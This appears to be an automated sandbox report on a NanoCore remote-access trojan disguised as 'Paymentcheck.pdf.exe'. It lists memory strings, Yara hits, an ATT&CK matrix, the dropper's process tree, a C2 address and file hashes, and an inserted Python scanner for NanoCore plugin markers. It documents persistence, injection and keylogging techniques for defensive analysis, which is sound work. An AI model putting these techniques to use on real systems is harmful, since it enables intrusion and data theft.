entHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegAsm.exe, 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
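The "String found in binary or memory" hits above are what the Detected Nanocore Rat signature keys on: .NET type and assembly names (NanoCore.ClientPluginHost, NanoCoreBase.dll, FileBrowserClient, MyClientPlugin.dll with its DisableWebcamLights command, NanoCoreStressTester, ClientPlugin.dll) that survive in the unpacked RegAsm.exe image even though the dropper itself is packed. The scanner below is an added example, not Joe Sandbox's signature logic: it searches a dump for those same markers in the ASCII form used by the .NET #Strings heap and in the UTF-16LE form used for user strings, attributes each hit to the plugin family it came from, and keeps working across chunk boundaries when a large dump is read piecewise. The marker-to-plugin grouping, the family labels and the constructed SAMPLE_DUMP are assumptions made for the example.

```python
"""Scan a memory dump or dropped file for NanoCore plugin markers.

Added example. MARKERS are tokens copied from the report's memory strings;
SAMPLE_DUMP is a constructed buffer, not a real dump.
"""
from __future__ import annotations

import re

# Distinctive tokens per plugin, chosen so that no token is a substring of a token
# belonging to another family (e.g. "MyClientPlugin.dll" is not used for ClientPlugin.dll).
MARKERS: dict[str, list[bytes]] = {
    "NanoCore core interface": [b"NanoCore.ClientPluginHost", b"NanoCore.ClientPlugin"],
    "NanoCoreBase.dll":        [b"NanoCoreBase.dll", b"set CDAudio door open"],
    "FileBrowserClient":       [b"FileBrowserClient", b"HandleReceiveFile"],
    "MyClientPlugin.dll":      [b"MyClientPlugin.dll", b"DisableWebcamLights"],
    "NanoCoreStressTester":    [b"NanoCoreStressTester", b"StartSuperSyn"],
    "ClientPlugin.dll":        [b"IClientReadOnlyNameObjectCollection", b"ClientInvokeDelegate"],
}

# One compiled pattern per (marker, encoding). Metadata identifiers sit in the
# #Strings heap as ASCII/UTF-8; literals from the #US heap are UTF-16LE.
PATTERNS = [
    (family, word.decode(), enc, re.compile(re.escape(word if enc == "ascii" else word.decode().encode("utf-16-le"))))
    for family, words in MARKERS.items()
    for word in words
    for enc in ("ascii", "utf-16le")
]

# Longest marker in its UTF-16LE form: the overlap a chunked scan must carry over.
OVERLAP = 2 * max(len(w) for ws in MARKERS.values() for w in ws)

Hit = tuple[str, str, int]   # (marker, encoding, absolute offset)


def scan(buf: bytes, base: int = 0) -> dict[str, list[Hit]]:
    """Return {family: [hits]} for every marker occurrence in buf; offsets are base-relative."""
    hits: dict[str, list[Hit]] = {}
    for family, word, enc, rx in PATTERNS:
        for m in rx.finditer(buf):
            hits.setdefault(family, []).append((word, enc, base + m.start()))
    return hits


def scan_chunks(chunks, overlap: int = OVERLAP) -> dict[str, list[Hit]]:
    """Scan an iterable of byte chunks (a dump read piecewise) without missing a
    marker that straddles a boundary and without counting it twice."""
    merged: dict[str, list[Hit]] = {}
    seen: set[Hit] = set()
    tail = b""
    offset = 0                       # absolute offset of tail[0], i.e. of the next buf
    for chunk in chunks:
        buf = tail + chunk
        for family, found in scan(buf, offset).items():
            for hit in found:
                if hit not in seen:
                    seen.add(hit)
                    merged.setdefault(family, []).append(hit)
        keep = min(len(buf), overlap)
        offset += len(buf) - keep
        tail = buf[len(buf) - keep:]
    return merged


def verdict(hits: dict[str, list[Hit]]) -> str:
    families = set(hits)
    plugins = sorted(families - {"NanoCore core interface"})
    if "NanoCore core interface" in families and plugins:
        return "NanoCore RAT with plugins: " + ", ".join(plugins)
    if families:
        return "NanoCore indicators present: " + ", ".join(sorted(families))
    return "no NanoCore markers"


# Constructed buffer: one ASCII marker, one UTF-16LE marker and one plugin name,
# padded with zero bytes to stand in for surrounding image data.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"NanoCore.ClientPluginHost"                    # ASCII, offset 64
    + b"\x00" * 16
    + "DisableWebcamLights".encode("utf-16-le")      # UTF-16LE, offset 105
    + b"\x00" * 16
    + b"NanoCoreStressTester"
    + b"\x00" * 32
)

if __name__ == "__main__":
    found = scan(SAMPLE_DUMP)
    for family, hs in found.items():
        print(family, hs)
    print(verdict(found))
```

Run it against a process dump (for instance the RegAsm.exe region listed as 0000000D.00000002.931452900 in the report) by feeding `scan_chunks` the file read in fixed-size pieces; the overlap makes the chunked result identical to scanning the whole file at once.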
Yara detected Nanocore RAT
Source: Yara match | File source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR

Mitre Att&ck Matrix

One column per tactic; the digits after a technique name are the matrix's signature-count badges.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | Input Capture 11 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 111 | Scheduled Task/Job 1 | Process Injection 212 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scheduled Task/Job 1 | Registry Run Keys / Startup Folder 11 | Scheduled Task/Job 1 | Scripting 111 | Security Account Manager | System Information Discovery 13 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Remote Access Software 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell 1 | Logon Script (Mac) | Registry Run Keys / Startup Folder 11 | Obfuscated Files or Information 13 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 13 | LSA Secrets | Security Software Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading 1 | DCSync | Virtualization/Sandbox Evasion 21 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading 12 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 21 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 212 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 458302
Sample: Paymentcheck.pdf.exe
Startdate: 03/08/2021
Architecture: WINDOWS
Score: 100

Signatures on the start node:
  • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Malicious sample detected (through community Yara rule)
  • Multi AV Scanner detection for dropped file
  • 13 other signatures

Process tree (numeric badges from the graph nodes kept in brackets):
  Paymentcheck.pdf.exe [3 9]
    dropped: C:\Users\user\AppData\...\msbuildd.exe (PE32)
    dropped: C:\Users\user\AppData\Local\Temp\RegAsm.exe (PE32)
    dropped: C:\Users\...\msbuildd.exe:Zone.Identifier (ASCII)
    dropped: 2 other malicious files
    signatures: Creates an undocumented autostart registry key; Writes to foreign memory regions; Injects a PE file into a foreign processes
    RegAsm.exe [1 14]
      network: 217.138.212.57, 2018, 49771 M247GB United Kingdom
      dropped: C:\Users\user\AppData\Roaming\...\run.dat (Non-ISO)
      dropped: C:\Users\user\AppData\Local\...\tmp715E.tmp (XML)
      dropped: C:\Program Files (x86)\...\dhcpmon.exe (PE32)
      signatures: Uses schtasks.exe or at.exe to add and modify task schedules
      schtasks.exe [1]
        conhost.exe
      schtasks.exe [1]
        conhost.exe
    wscript.exe [1]
      signatures: Wscript starts Powershell (via cmd or directly)
      powershell.exe [9]
        conhost.exe
  RegAsm.exe [2]
    conhost.exe
  dhcpmon.exe
    conhost.exe
  dhcpmon.exe
    conhost.exe

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Paymentcheck.pdf.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Virustotal |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Metadefender |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe | 33% | ReversingLabs | ByteCode-MSIL.Downloader.Seraph

Unpacked PE Files

Source | Detection | Scanner | Label
13.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
13.2.RegAsm.exe.5210000.21.unpack | 100% | Avira | TR/NanoCore.fadte

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.fontbureau.comV | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.fontbureau.coma | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.fontbureau.comgrita | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.fontbureau.comttva | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers? | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comV | Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://google.com | RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.coma | Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.coml | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comgrita | Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand | powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comttva | Paymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Paymentcheck.pdf.exe, 00000000.00000002.821957126.0000000002A21000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.931755679.00000000048B4000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://oneget.org | powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                              Contacted IPs


                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
217.138.212.57 | unknown | United Kingdom | 9009 | M247GB | true

                              General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 458302
Start date: 03.08.2021
Start time: 08:25:33
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 55s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Paymentcheck.pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@20/21@0/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 6.9% (good quality ratio 5.6%)
• Quality average: 59.4%
• Quality standard deviation: 30.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 70
• Number of non-executed functions: 2
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

Time | Type | Description
08:27:49 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegAsm.exe" s>$(Arg0)
08:27:50 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
08:27:51 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
08:28:28 | API Interceptor | 11x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 64616
Entropy (8bit): 6.037264560032456
Encrypted: false
SSDEEP: 768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
MD5: 6FD7592411112729BF6B1F2F6C34899F
SHA1: 5E5C839726D6A43C478AB0B95DBF52136679F5EA
SHA-256: FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
SHA-512: 21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
Malicious: false
Antivirus:
• Antivirus: Virustotal, Detection: 0%
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Paymentcheck.pdf.exe.log
Process: C:\Users\user\Desktop\Paymentcheck.pdf.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1119
Entropy (8bit): 5.356708753875314
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
MD5: 3197B1D4714B56F2A6AC9E83761739AE
SHA1: 3B38010F0DF51C1D4D2C020138202DABB686741D
SHA-256: 40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
SHA-512: 58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
Malicious: true
Reputation: unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 42
Entropy (8bit): 4.0050635535766075
Encrypted: false
SSDEEP: 3:QHXMKa/xwwUy:Q3La/xwQ
MD5: 84CFDB4B995B1DBF543B26B86C863ADC
SHA1: D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256: D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512: 485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious: false
Reputation: unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
Process: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 42
Entropy (8bit): 4.0050635535766075
Encrypted: false
SSDEEP: 3:QHXMKa/xwwUy:Q3La/xwQ
MD5: 84CFDB4B995B1DBF543B26B86C863ADC
SHA1: D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256: D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
